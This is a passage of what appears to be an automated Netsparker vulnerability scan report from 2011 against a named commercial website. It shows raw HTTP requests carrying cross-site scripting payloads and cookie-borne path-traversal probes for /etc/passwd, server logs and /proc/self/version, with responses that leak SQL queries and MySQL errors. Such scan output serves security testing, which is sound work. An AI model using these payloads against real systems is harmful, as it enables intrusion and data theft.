OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f6dckrqo0bup2vuvlo1nm9gqa5; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005B4)</script>

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3h7rvl03g0q4g3ohabkik7jn12; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%22--%3E%3C/style%3E%3C/..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '"--></style></script><script>alert(0x0005B3)</script>

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u5v9s4nuqagjdfs0joav6rqn24; path=/
Content-Length: 3263
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E

/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005B7)</script>

Request

GET /ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 